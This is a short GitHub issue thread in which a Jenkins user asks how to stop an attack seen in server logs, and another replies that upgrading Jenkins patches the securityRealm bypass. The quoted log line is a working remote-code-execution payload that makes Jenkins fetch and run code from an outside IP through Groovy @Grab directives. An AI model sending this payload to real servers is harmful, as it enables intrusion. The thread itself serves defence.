Need help: How to prevent from the attack
Closed this issue · 1 comments
p00j4 commented
Observing the attack, apart from blocking IP, what more can be done to prevent from any future similar attacks? I'm not using ```workflow-cps-plugin`` then wondering how is this attack reaching
"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='FLSOA',root='http://107.170.26.148/')%0a@Grab(group='VSCYG',module='BNTJL',version='1')%0aimport%20KJNME; HTTP/1.1" 499 0 "-" "python-requests/2.18.4"
petercunha commented
To prevent the attack, update to the latest version of Jenkins. They have patched the securityRealm bypass in their latest release.